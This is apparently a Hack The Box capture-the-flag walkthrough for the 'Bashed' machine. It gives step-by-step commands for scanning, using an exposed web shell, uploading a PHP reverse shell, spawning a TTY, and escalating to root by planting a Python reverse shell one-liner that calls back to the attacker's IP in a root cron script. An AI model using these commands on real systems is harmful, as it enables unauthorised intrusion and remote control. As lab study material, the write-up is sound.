Bashed
HTB 8. Bashed
nmap -A -T4 -p- 10.10.10.68
shows port 80 withApache httpd 2.4.18 (Ubuntu)
.searchsploit apache 2.4
reveals localapache_ctl
exploit.Going to website
10.10.10.68
and looking at content shows that10.10.10.68/uploads
. exists.dirbuster
time with medium wordlist which reveals several folders.View source code of pages shows nothing.
dirbuster
founddev/phpbash.php
.Go to
10.10.10.68
and launchphpbash.php
which launches web terminal.whoami
iswww-data
so lets get the user flag.cat /home/arrexel/user.txt
.test
sudo -l
andhistory
which shows we can becomescriptmanager
user without password.Can't change to
scriptmanager
because we are in a wbeshell without a tty.cd /var/www/html/uploads/
and upload payload.Lets try
php-reverse-shell
from pentestmonkey instead of metasploit. Download and extract.Edit the
$ip
and$port
to our ip and port1234
.Start web server
python -m SimpleHTTPServer 80
and runwet http://10.10.14.21/rev.php
on the target.Start netcat
nc -nvlp 1234
Go to
10.10.10.68/uploads/rev.php
to execute and connect.Still can't access tty so serach for
tty escape
and go to to Spawning a TTY Shell.Just go down the list and try the options. Try
python -c 'import pty; pty.spawn("/bin/bash")'
and no we are inbash
.sudo su scriptmanager
does not work so lets try running a command as the usersudo -u scriptmanager /bin/bash
.whoami
isscripmanager
andhistory
is none.ls -la /
showsscriptmanager
owns/scripts
.cd scripts
andls -la
showstest.py
andtest.txt
.The time modified for the
test.txt
changes every minute so a cronjob is running thetest.py
evvery minute as root. Lets change thetest.py
so it performs malicious actions.Search for
python reverse shell
and use the Reverse Shell Cheat Sheet.Use
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.21",2345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);
(-i
is interactive mode) and download to target.Start listening
nc -nvlp 2345
and wait for shell.
Someone exploited with CVE-2017-16995
found after running the linux-exploit-suggester
.
Last updated